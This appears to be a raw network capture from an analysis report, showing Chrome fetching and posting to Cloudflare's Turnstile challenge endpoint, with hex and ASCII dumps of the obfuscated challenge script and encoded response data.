                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 28 31 30 39 39 29 5d 26 26 28 6b 3d 6c 5b 68 69 28 39 39 32 29 5d 28 69 5b 68 69 28 36 33 33 29 5d 2c 6d 5b 68 69 28 39 38 33 29 5d 5b 68 69 28 31 30 39 39 29 5d 29 29 3a 66 5b 68 69 28 36 38 30 29 5d 3d 4a 53 4f 4e 5b 68 69 28 31 33 36 37 29 5d 28 66 5b 68 69 28 36 38 30 29 5d 2c 4f 62 6a 65 63 74 5b 68 69 28 37 37 33 29 5d 28 66 5b 68 69 28 36 38 30 29 5d 29 29 3a 68 69 28 36 35 35 29 3d 3d 3d 69 5b 68 69 28 31 33 37 38 29 5d 3f 66 5e 3d 67 5b 68 69 28 31 30 30 32 29 5d 28 68 29 3a 66 5b 68 69 28 36 38 30 29 5d 3d 4a 53 4f 4e 5b 68 69 28 31 33 36 37 29 5d 28 66 5b 68 69 28 36 38 30 29 5d 29 2c 6b 3d 68 7c 7c 68 69 28 35 34 35 29 2c 6c 3d 65 4d 5b 68 69 28 39 38 33 29 5d 5b 68 69 28 35 38 30 29 5d 3f 27 68 2f 27 2b 65 4d 5b 68 69 28 39 38 33 29 5d 5b 68
                                                                              Data Ascii: (1099)]&&(k=l[hi(992)](i[hi(633)],m[hi(983)][hi(1099)])):f[hi(680)]=JSON[hi(1367)](f[hi(680)],Object[hi(773)](f[hi(680)])):hi(655)===i[hi(1378)]?f^=g[hi(1002)](h):f[hi(680)]=JSON[hi(1367)](f[hi(680)]),k=h||hi(545),l=eM[hi(983)][hi(580)]?'h/'+eM[hi(983)][h
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 2c 6b 3d 70 61 72 73 65 49 6e 74 28 6e 5b 33 5d 2c 31 30 29 29 29 3a 65 3d 66 5b 68 6a 28 39 39 32 29 5d 28 68 6a 28 32 39 35 29 2c 68 6a 28 31 36 34 38 29 29 29 3a 67 5b 68 6a 28 31 34 39 35 29 5d 28 68 6a 28 39 31 32 29 2c 67 5b 68 6a 28 31 30 31 39 29 5d 29 3f 28 67 5b 68 6a 28 35 39 32 29 5d 5b 68 6a 28 37 33 30 29 5d 28 29 2c 68 5b 68 6a 28 35 39 32 29 5d 5b 68 6a 28 31 34 37 31 29 5d 28 29 2c 69 5b 68 6a 28 35 39 32 29 5d 5b 68 6a 28 31 34 37 36 29 5d 28 29 2c 6a 5b 68 6a 28 31 35 39 35 29 5d 3d 21 21 5b 5d 29 3a 68 3d 4a 53 4f 4e 5b 68 6a 28 31 33 36 37 29 5d 28 65 29 3b 72 65 74 75 72 6e 20 6f 3d 7b 7d 2c 6f 5b 68 6a 28 37 31 31 29 5d 3d 68 2c 6f 5b 68 6a 28 33 39 35 29 5d 3d 69 2c 6f 5b 68 6a 28 36 34 32 29 5d 3d 6a 2c 6f 5b 68 6a 28 31 31 33 36
                                                                              Data Ascii: ,k=parseInt(n[3],10))):e=f[hj(992)](hj(295),hj(1648))):g[hj(1495)](hj(912),g[hj(1019)])?(g[hj(592)][hj(730)](),h[hj(592)][hj(1471)](),i[hj(592)][hj(1476)](),j[hj(1595)]=!![]):h=JSON[hj(1367)](e);return o={},o[hj(711)]=h,o[hj(395)]=i,o[hj(642)]=j,o[hj(1136
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 20 66 3d 3d 3d 67 7d 2c 27 6d 48 50 65 65 27 3a 69 36 28 35 30 38 29 7d 2c 65 3d 63 5b 69 36 28 31 34 35 31 29 5d 2c 65 26 26 64 5b 69 36 28 31 34 36 38 29 5d 28 65 5b 69 36 28 31 30 38 37 29 5d 2c 64 5b 69 36 28 34 36 38 29 5d 29 26 26 65 5b 69 36 28 31 36 31 38 29 5d 3d 3d 3d 69 36 28 31 32 39 35 29 3f 66 55 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 37 29 7b 69 37 3d 69 36 2c 64 5b 69 37 28 33 32 32 29 5d 28 67 6b 29 7d 2c 31 65 33 29 3a 65 26 26 64 5b 69 36 28 31 34 36 38 29 5d 28 65 5b 69 36 28 31 30 38 37 29 5d 2c 69 36 28 35 30 38 29 29 26 26 65 5b 69 36 28 31 36 31 38 29 5d 3d 3d 3d 69 36 28 31 33 36 32 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 55 29 7d 29 2c 66 57 3d 21 5b 5d 2c 21 66 6e 28 67 4a 28 36 39 37
                                                                              Data Ascii: f===g},'mHPee':i6(508)},e=c[i6(1451)],e&&d[i6(1468)](e[i6(1087)],d[i6(468)])&&e[i6(1618)]===i6(1295)?fU=setInterval(function(i7){i7=i6,d[i7(322)](gk)},1e3):e&&d[i6(1468)](e[i6(1087)],i6(508))&&e[i6(1618)]===i6(1362)&&clearInterval(fU)}),fW=![],!fn(gJ(697
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 75 72 6e 20 47 2b 48 7d 2c 27 4d 69 6d 68 61 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 7d 2c 68 3d 3d 3d 6e 75 6c 6c 7c 7c 6f 5b 69 4e 28 39 31 36 29 5d 28 76 6f 69 64 20 30 2c 68 29 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 6f 5b 69 4e 28 31 35 33 35 29 5d 28 67 71 2c 68 29 2c 67 5b 69 4e 28 31 34 38 33 29 5d 5b 69 4e 28 37 37 33 29 5d 26 26 28 78 3d 78 5b 69 4e 28 37 33 38 29 5d 28 67 5b 69 4e 28 31 34 38 33 29 5d 5b 69 4e 28 37 37 33 29 5d 28 68 29 29 29 2c 78 3d 67 5b 69 4e 28 35 35 34 29 5d 5b 69 4e 28 31 31 33 32 29 5d 26 26 67 5b 69 4e 28 39 39 37 29 5d 3f 67 5b 69 4e 28 35 35 34 29 5d 5b 69 4e 28 31 31 33 32 29 5d 28 6e 65 77 20 67 5b 28 69 4e 28 39 39 37 29 29 5d 28 78 29 29 3a 66 75 6e
                                                                              Data Ascii: urn G+H},'Mimha':function(G,H,I){return G(H,I)}},h===null||o[iN(916)](void 0,h))return j;for(x=o[iN(1535)](gq,h),g[iN(1483)][iN(773)]&&(x=x[iN(738)](g[iN(1483)][iN(773)](h))),x=g[iN(554)][iN(1132)]&&g[iN(997)]?g[iN(554)][iN(1132)](new g[(iN(997))](x)):fun
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 72 65 74 75 72 6e 20 67 76 28 63 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75 72 6e 20 65 5b 6a 35 28 38 39 31 29 5d 28 67 74 2c 65 5b 6a 35 28 38 39 31 29 5d 28 67 75 2c 63 29 29 7d 7d 2c 67 77 3d 66 75 6e 63 74 69 6f 6e 28 6a 36 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6a 36 3d 67 4a 2c 64 3d 7b 27 78 59 4d 51 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 66 58 6d 52 71 27 3a 6a 36 28 31 33 30 32 29 2c 27 61 6d 51 62 50 27 3a 6a 36 28 38 36 34 29 2c 27 43 4f 48 77 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 48 50 6e 49 76 27 3a 6a 36 28 31 35 36 37 29 2c 27 44 47 7a 65 65 27 3a 6a 36 28 35 30 35 29 2c 27 6b 49 4e 6e 68 27 3a 66 75 6e 63 74 69 6f 6e
                                                                              Data Ascii: return gv(c)}catch(g){return e[j5(891)](gt,e[j5(891)](gu,c))}},gw=function(j6,d,e,f,g){return j6=gJ,d={'xYMQo':function(h,i){return h===i},'fXmRq':j6(1302),'amQbP':j6(864),'COHwG':function(h,i){return h>i},'HPnIv':j6(1567),'DGzee':j6(505),'kINnh':function
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 6a 3d 7b 7d 2c 6a 5b 6a 37 28 34 30 36 29 5d 3d 6a 37 28 31 32 30 33 29 2c 6b 3d 6a 2c 64 5b 6a 37 28 31 34 32 30 29 5d 28 64 5b 6a 37 28 31 36 30 32 29 5d 2c 64 5b 6a 37 28 31 36 30 32 29 5d 29 29 72 65 74 75 72 6e 20 64 5b 6a 37 28 37 39 30 29 5d 5b 6a 37 28 31 36 33 30 29 5d 28 69 29 3b 65 6c 73 65 20 66 5b 6b 5b 6a 37 28 34 30 36 29 5d 5d 26 26 28 6d 3d 7b 7d 2c 6d 5b 6a 37 28 31 30 38 37 29 5d 3d 6a 37 28 35 30 38 29 2c 6d 5b 6a 37 28 31 30 34 30 29 5d 3d 6a 5b 6a 37 28 39 38 33 29 5d 5b 6a 37 28 31 33 35 31 29 5d 2c 6d 5b 6a 37 28 38 31 33 29 5d 3d 6a 37 28 39 32 39 29 2c 6d 5b 6a 37 28 31 36 31 38 29 5d 3d 6a 37 28 37 38 35 29 2c 69 5b 6b 5b 6a 37 28 34 30 36 29 5d 5d 5b 6a 37 28 38 30 39 29 5d 28 6d 2c 27 2a 27 29 29 7d 29 7d 2c 27 67 27 3a 66 75
                                                                              Data Ascii: j={},j[j7(406)]=j7(1203),k=j,d[j7(1420)](d[j7(1602)],d[j7(1602)]))return d[j7(790)][j7(1630)](i);else f[k[j7(406)]]&&(m={},m[j7(1087)]=j7(508),m[j7(1040)]=j[j7(983)][j7(1351)],m[j7(813)]=j7(929),m[j7(1618)]=j7(785),i[k[j7(406)]][j7(809)](m,'*'))})},'g':fu
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 66 28 64 5b 6a 38 28 31 36 30 30 29 5d 28 32 35 36 2c 43 5b 6a 38 28 31 30 30 32 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 6a 38 28 31 34 34 33 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 6a 38 28 31 36 32 35 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 6a 38 28 31 30 30 32 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 6a 38 28 33 34 31 29 5d 28 48 3c 3c 31 2e 30 32 2c 31 26 4d 29 2c 64 5b 6a 38 28 32 39 37 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 6a 38 28 31 36 32 35 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 64 5b 6a 38 28 34 34 31 29 5d 28
                                                                              Data Ascii: f(d[j8(1600)](256,C[j8(1002)](0))){for(s=0;d[j8(1443)](s,F);H<<=1,j-1==I?(I=0,G[j8(1625)](o(H)),H=0):I++,s++);for(M=C[j8(1002)](0),s=0;8>s;H=d[j8(341)](H<<1.02,1&M),d[j8(297)](I,j-1)?(I=0,G[j8(1625)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;d[j8(441)](


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.1649745104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:48 UTC1173OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/162202576:1732648377:xJw3Yk9mP_9VbSTJ6hBeBUYSgE5rlGFuHoiAhOyQQkY/8e8c6e9b1b1b437a/U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 3039
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:48 UTC3039OUTData Raw: 76 5f 38 65 38 63 36 65 39 62 31 62 31 62 34 33 37 61 3d 39 78 65 49 56 49 38 49 39 49 36 49 6c 35 47 6d 35 47 4a 49 35 30 49 79 77 65 68 47 64 35 69 66 47 46 41 47 72 77 70 77 35 30 38 47 69 49 39 65 35 71 25 32 62 65 47 57 74 61 77 6c 68 37 6e 43 47 75 73 49 47 4b 30 47 38 77 72 32 47 6f 6a 37 31 47 6a 6f 77 72 6e 47 5a 77 47 66 47 61 6a 47 34 2b 37 49 35 68 47 43 47 72 68 37 70 59 2d 43 56 6a 46 56 35 47 35 71 54 55 79 59 70 68 4d 51 4a 56 51 45 4b 36 78 67 35 4a 30 45 46 73 72 64 49 72 69 78 33 77 59 73 76 75 71 72 47 72 34 53 24 32 2d 47 24 37 6a 74 31 77 6a 4f 74 7a 35 47 6e 65 30 30 35 49 47 32 24 47 47 24 49 37 69 47 71 59 47 6d 46 49 4d 58 47 47 2b 78 49 72 35 45 64 5a 77 78 32 65 56 45 4b 49 64 71 47 47 41 47 65 65 47 33 49 72 31 5a 63 51 73 47
                                                                              Data Ascii: v_8e8c6e9b1b1b437a=9xeIVI8I9I6Il5Gm5GJI50IywehGd5ifGFAGrwpw508GiI9e5q%2beGWtawlh7nCGusIGK0G8wr2Goj71GjowrnGZwGfGajG4+7I5hGCGrh7pY-CVjFV5G5qTUyYphMQJVQEK6xg5J0EFsrdIrix3wYsvuqrGr4S$2-G$7jt1wjOtz5Gne005IG2$GG$I7iGqYGmFIMXGG+xIr5EdZwx2eVEKIdqGGAGeeG3Ir1ZcQsG
                                                                              2024-11-26 19:54:48 UTC747INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:48 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 149928
                                                                              Connection: close
                                                                              cf-chl-gen: 5MRIR9EWWFCF0jkTb+kX6m95UBOU4gYWn3BsKXdY8xEsurFsGbbCPqymIMXUN02DZXIq148lymQpWftXpN2f2sqWxc2GdYs6+pozmtPVc0Rf7Y+nZRpHGfd9zBgaXRERzZ3+8F6wykIWwimc3oDiEbE/V51E5FQQPo/mLfs+o084RWe3FGSuQ0NwXL9N+LpNODzISbWo4Ek4kllNBMRig1vb+gKrjeG2ER8/UfedOnl4/dHEmSraNOxoIfppt4eSbFe54+4Prhiu4EfZdALCy2bow9IVumNVsd7nX+UBnF2a3ofROeH6Hoyc40Xtax6x7lhcaYRSmx2umb5AgCPs8dLnFhidcgTlNfaPX6n5NHhyRKHqs3EWIF0py3dVPe2F//U7s+7kCK83RNqdSIFRhfwz2u4leS88+SN5mNcIfqq4v/VmiXtpB6jRRLmUhtSpMrQYzxlASExoRCAmfJVLVdoumT1cjnT5X7XKAuKr/++aOh0=$FzcQAuqzEPlyFhGf
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6eb55d115e7c-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:48 UTC622INData Raw: 57 49 52 43 64 6d 4a 61 58 31 42 6f 53 6f 70 4c 55 46 39 66 61 6f 4a 54 65 4a 4a 39 6b 6f 71 64 65 32 71 51 58 31 39 6a 5a 47 4b 65 5a 6d 6d 49 6f 34 57 50 67 48 78 71 61 34 36 65 62 33 61 74 6c 59 75 59 73 71 65 4a 69 35 32 4c 73 48 37 43 66 5a 43 31 78 61 57 39 6c 4a 69 31 7a 4d 4c 4f 72 59 2f 44 31 64 54 51 73 71 2f 5a 31 4a 47 75 32 73 6a 49 77 61 43 76 74 64 72 67 30 5a 33 44 6f 72 2b 68 78 2b 37 70 77 74 33 79 73 64 7a 47 74 4d 50 42 37 76 50 33 31 74 54 2b 36 2b 7a 53 37 37 6a 4d 32 2f 33 5a 31 75 4d 4c 79 74 62 58 44 38 37 69 38 65 58 62 79 67 37 6f 35 39 62 58 38 51 37 72 36 2f 6a 75 47 51 38 4d 45 42 7a 6a 34 42 58 76 2f 68 50 6b 49 2b 59 58 2f 4f 66 74 43 69 67 56 37 42 54 75 4b 53 55 30 2b 76 72 31 46 42 45 79 50 78 66 2b 4e 41 45 46 4e 2f 34
                                                                              Data Ascii: WIRCdmJaX1BoSopLUF9faoJTeJJ9koqde2qQX19jZGKeZmmIo4WPgHxqa46eb3atlYuYsqeJi52LsH7CfZC1xaW9lJi1zMLOrY/D1dTQsq/Z1JGu2sjIwaCvtdrg0Z3Dor+hx+7pwt3ysdzGtMPB7vP31tT+6+zS77jM2/3Z1uMLytbXD87i8eXbyg7o59bX8Q7r6/juGQ8MEBzj4BXv/hPkI+YX/OftCigV7BTuKSU0+vr1FBEyPxf+NAEFN/4
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 77 36 57 69 39 42 57 30 51 6a 55 30 4d 5a 50 6c 45 31 57 47 4a 4c 53 6d 55 71 49 30 52 6a 58 46 4e 65 62 55 35 6f 56 6d 78 45 4f 6b 73 38 66 48 52 34 51 56 52 33 59 6c 5a 35 51 45 4e 73 62 58 78 76 67 58 75 44 54 33 31 54 59 31 42 34 56 6c 4b 48 6a 48 79 55 68 6e 32 4d 62 32 70 62 6d 59 2b 64 59 4b 52 31 6b 6f 4b 57 6c 36 61 50 6b 59 47 44 6d 34 79 52 72 32 36 70 68 49 71 62 73 6e 64 35 76 5a 57 79 72 6f 2b 55 76 4a 4f 47 73 62 75 32 76 71 53 45 67 4d 53 62 6b 4d 61 6b 73 4d 2f 55 76 38 33 42 74 73 69 79 7a 70 65 59 6b 74 62 5a 72 37 61 30 75 37 75 38 6f 64 33 61 77 4d 4c 5a 32 72 76 70 78 39 43 39 34 66 48 71 7a 4c 58 31 79 4d 69 33 2b 63 7a 4d 41 2f 33 51 30 41 4d 43 31 4e 58 63 42 74 6a 5a 33 41 72 63 33 64 77 4f 34 4f 44 4c 45 75 54 6b 41 2b 76 37 42
                                                                              Data Ascii: w6Wi9BW0QjU0MZPlE1WGJLSmUqI0RjXFNebU5oVmxEOks8fHR4QVR3YlZ5QENsbXxvgXuDT31TY1B4VlKHjHyUhn2Mb2pbmY+dYKR1koKWl6aPkYGDm4yRr26phIqbsnd5vZWyro+UvJOGsbu2vqSEgMSbkMaksM/Uv83BtsiyzpeYktbZr7a0u7u8od3awMLZ2rvpx9C94fHqzLX1yMi3+czMA/3Q0AMC1NXcBtjZ3Arc3dwO4ODLEuTkA+v7B
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 46 46 7a 63 6b 4a 54 59 68 52 79 70 62 4a 43 56 66 61 47 4a 6e 4c 47 4e 4e 63 57 4a 35 59 6c 42 57 56 6d 31 38 57 31 71 41 68 47 39 66 58 56 70 70 5a 46 68 6c 61 6c 74 46 59 47 68 71 62 59 79 42 61 70 46 6b 61 4a 53 61 64 6e 65 47 56 59 65 4e 56 32 70 76 67 57 4a 68 6e 5a 4a 67 65 6e 4f 4b 72 61 53 74 6d 4b 79 6f 69 34 2b 49 72 49 2b 54 69 4c 43 54 6c 34 69 30 6c 35 71 41 67 4a 79 55 70 4b 4f 63 6b 4c 6e 42 6f 36 7a 43 70 34 37 4b 73 73 47 75 6a 38 76 43 71 62 50 50 31 71 37 46 75 4c 6e 4e 6d 73 71 79 6c 5a 72 57 30 39 33 48 70 74 50 5a 77 63 48 68 77 75 58 6d 72 61 57 6d 7a 38 4c 79 34 2b 50 4d 78 4e 54 61 2f 4e 6a 38 36 39 62 4e 34 4c 33 65 34 41 50 57 36 50 33 49 31 38 44 39 33 52 45 4f 32 39 7a 50 31 65 4d 59 42 4f 2f 76 48 4f 58 2b 36 76 6a 58 31 50
                                                                              Data Ascii: FFzckJTYhRypbJCVfaGJnLGNNcWJ5YlBWVm18W1qAhG9fXVppZFhlaltFYGhqbYyBapFkaJSadneGVYeNV2pvgWJhnZJgenOKraStmKyoi4+IrI+TiLCTl4i0l5qAgJyUpKOckLnBo6zCp47KssGuj8vCqbPP1q7FuLnNmsqylZrW093HptPZwcHhwuXmraWmz8Ly4+PMxNTa/Nj869bN4L3e4APW6P3I18D93REO29zP1eMYBO/vHOX+6vjX1P
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 56 45 56 47 52 69 31 4a 53 6b 6b 78 54 55 35 45 64 31 5a 48 4d 55 78 55 56 6c 6c 34 62 56 5a 39 55 46 52 2f 57 56 32 49 5a 48 35 63 5a 34 68 4e 53 48 68 79 6b 49 31 39 54 48 5a 53 65 4a 68 71 69 59 69 59 6a 4a 74 62 6f 49 35 61 64 4a 35 78 6d 47 61 49 68 4a 2b 5a 5a 6d 53 43 6a 35 43 69 71 37 47 52 6b 6f 47 46 75 49 6d 6c 68 33 57 58 71 72 53 65 6a 58 2b 7a 6b 38 47 6e 76 34 47 69 6e 62 71 63 70 5a 66 4e 7a 59 37 54 6f 71 4b 75 75 4c 50 44 6b 37 43 63 6c 35 6e 4c 30 37 33 42 75 5a 33 61 34 4e 33 44 30 71 54 4b 33 4d 76 67 6f 65 50 4c 71 65 6a 78 33 75 7a 32 74 39 54 6a 37 75 37 6d 31 2b 6a 33 77 65 32 36 31 76 37 39 42 74 2f 6f 35 66 37 6a 2b 74 76 50 45 51 67 45 46 42 55 56 43 77 2f 59 36 65 33 78 36 74 76 33 36 75 30 58 32 68 76 36 37 65 62 38 39 74 38
                                                                              Data Ascii: VEVGRi1JSkkxTU5Ed1ZHMUxUVll4bVZ9UFR/WV2IZH5cZ4hNSHhykI19THZSeJhqiYiYjJtboI5adJ5xmGaIhJ+ZZmSCj5Ciq7GRkoGFuImlh3WXqrSejX+zk8Gnv4GinbqcpZfNzY7ToqKuuLPDk7Ccl5nL073BuZ3a4N3D0qTK3MvgoePLqejx3uz2t9Tj7u7m1+j3we261v79Bt/o5f7j+tvPEQgEFBUVCw/Y6e3x6tv36u0X2hv67eb89t8
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 46 35 77 53 56 31 48 63 44 4d 79 54 47 74 34 52 56 63 35 61 55 6c 31 59 6e 56 43 63 49 4a 44 56 6d 42 72 64 33 39 6e 6b 48 6c 67 5a 45 35 74 61 47 43 58 5a 48 42 6d 63 6f 79 49 6b 49 36 68 65 70 5a 75 6e 31 35 6c 59 4b 5a 30 5a 4b 61 61 70 4b 36 6e 61 70 2b 72 70 5a 53 31 61 49 2b 6c 68 61 79 32 6c 70 61 2f 73 4a 75 58 76 62 61 4d 76 37 75 31 69 4d 65 32 6f 4b 6a 4a 6f 73 75 36 73 61 71 39 77 59 2b 32 74 37 44 61 71 73 6e 49 31 39 54 64 79 62 4c 59 75 37 2b 7a 31 4a 33 42 74 63 57 34 32 38 6e 4f 76 4b 62 72 75 73 58 65 35 76 61 70 36 76 43 77 2b 62 7a 63 36 72 76 67 30 41 43 37 77 73 4f 2f 78 65 50 6f 34 51 6e 48 2b 51 4d 46 34 67 41 55 35 51 54 4d 37 64 50 6e 47 74 59 4d 36 76 54 2b 32 52 72 34 45 66 76 32 41 2f 59 45 38 78 77 68 41 51 6a 39 42 2f 67 6c
                                                                              Data Ascii: F5wSV1HcDMyTGt4RVc5aUl1YnVCcIJDVmBrd39nkHlgZE5taGCXZHBmcoyIkI6hepZun15lYKZ0ZKaapK6nap+rpZS1aI+lhay2lpa/sJuXvbaMv7u1iMe2oKjJosu6saq9wY+2t7DaqsnI19TdybLYu7+z1J3BtcW428nOvKbrusXe5vap6vCw+bzc6rvg0AC7wsO/xePo4QnH+QMF4gAU5QTM7dPnGtYM6vT+2Rr4Efv2A/YE8xwhAQj9B/gl
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 51 79 52 6e 70 74 52 56 56 5a 4e 30 35 63 62 58 5a 69 56 31 39 6b 64 47 4e 6e 65 6d 35 57 61 32 78 2f 55 47 2b 47 63 6d 56 78 59 48 6c 6e 64 31 4f 59 5a 33 6d 53 61 58 4a 2b 6c 70 42 35 67 35 79 63 63 34 56 6a 70 32 36 47 5a 33 32 41 6a 32 70 78 62 6f 31 78 68 6e 4f 6d 71 72 75 61 64 59 68 37 67 61 47 63 6f 71 65 52 74 6f 43 67 6c 72 71 49 70 4a 69 72 69 34 53 69 7a 37 57 52 6a 36 76 42 6c 4a 57 53 6d 4d 33 4d 79 72 37 44 6d 65 47 63 6e 4c 53 77 70 39 6e 4a 7a 62 37 44 36 64 72 71 34 62 2f 75 79 4d 4f 2f 74 4c 57 73 79 65 32 38 33 50 33 38 33 76 6d 39 32 4e 76 53 38 77 50 59 34 74 6f 41 2b 4d 66 35 33 64 6b 42 34 50 58 4f 43 77 58 56 30 52 67 46 48 52 66 57 37 50 66 63 31 50 77 6d 4a 66 51 46 42 42 6b 69 39 2f 62 6a 42 51 51 46 36 2b 77 54 4c 4f 63 6b 36
                                                                              Data Ascii: QyRnptRVVZN05cbXZiV19kdGNnem5Wa2x/UG+GcmVxYHlnd1OYZ3mSaXJ+lpB5g5ycc4Vjp26GZ32Aj2pxbo1xhnOmqruadYh7gaGcoqeRtoCglrqIpJiri4Siz7WRj6vBlJWSmM3Myr7DmeGcnLSwp9nJzb7D6drq4b/uyMO/tLWsye283P383vm92NvS8wPY4toA+Mf53dkB4PXOCwXV0RgFHRfW7Pfc1PwmJfQFBBki9/bjBQQF6+wTLOck6
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 4a 58 33 39 64 56 31 68 2f 66 46 74 38 53 57 5a 6d 57 59 42 70 61 59 31 75 62 49 4e 51 68 6d 52 56 59 4a 70 4d 65 6f 39 56 69 49 64 2b 65 6f 31 2f 6d 57 36 58 6b 5a 74 68 71 4a 53 68 6f 48 71 48 62 6e 75 6e 73 33 53 48 64 72 4e 33 6a 33 70 78 6c 36 36 5a 6c 62 75 63 6e 38 47 61 64 35 61 69 67 4c 65 63 6f 4d 65 6e 6a 4d 62 49 72 38 6a 4f 76 4b 76 4e 78 5a 57 36 72 39 57 6f 32 39 71 6f 6d 64 58 61 6c 65 50 55 76 4b 62 45 35 38 76 6d 78 73 62 63 37 4d 76 4b 37 2f 54 66 7a 38 54 42 35 4d 57 78 38 74 54 57 32 66 6a 74 31 76 33 51 31 41 48 61 33 65 58 62 34 76 58 6c 2b 75 37 76 36 4d 2f 69 41 67 48 4d 44 52 59 42 47 52 48 7a 39 68 6a 63 2b 77 45 42 33 2f 73 57 31 78 55 69 49 65 59 54 44 66 59 4e 48 79 6a 37 37 75 30 71 4c 77 6b 49 4e 67 30 6e 49 7a 6b 78 48 44
                                                                              Data Ascii: JX39dV1h/fFt8SWZmWYBpaY1ubINQhmRVYJpMeo9ViId+eo1/mW6XkZthqJShoHqHbnuns3SHdrN3j3pxl66Zlbucn8Gad5aigLecoMenjMbIr8jOvKvNxZW6r9Wo29qomdXalePUvKbE58vmxsbc7MvK7/Tfz8TB5MWx8tTW2fjt1v3Q1AHa3eXb4vXl+u7v6M/iAgHMDRYBGRHz9hjc+wEB3/sW1xUiIeYTDfYNHyj77u0qLwkINg0nIzkxHD
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 55 48 32 41 66 58 69 43 53 6f 56 36 57 47 35 75 57 34 39 78 55 48 65 59 69 33 4e 31 6d 57 5a 76 62 6f 79 56 6b 4a 4a 33 6f 35 75 43 58 59 42 78 65 61 4b 48 67 4b 64 68 69 58 47 70 67 36 79 32 72 71 4b 5a 6b 34 70 37 74 37 71 64 66 37 32 79 73 58 32 61 6d 70 65 59 67 5a 69 44 78 4d 50 48 6a 61 79 61 6b 4e 47 6f 78 62 57 79 7a 73 75 69 72 4b 58 64 72 64 69 77 75 73 2f 50 30 4e 43 31 7a 37 6e 55 6d 37 76 70 33 75 76 41 78 4e 76 4d 77 4f 37 72 38 4b 6a 72 74 65 58 78 38 50 54 62 33 66 72 35 38 66 48 34 31 74 6e 58 2f 76 54 57 77 39 34 46 32 63 33 73 32 74 41 53 36 41 62 31 38 67 38 4d 34 64 6e 6a 35 2b 6b 56 37 53 4c 78 46 76 51 6c 46 65 62 69 47 43 51 69 36 65 63 6a 2b 41 76 34 4b 4f 33 72 43 53 62 76 4c 50 51 6d 38 7a 67 50 44 43 6b 32 50 7a 59 37 2f 69 51
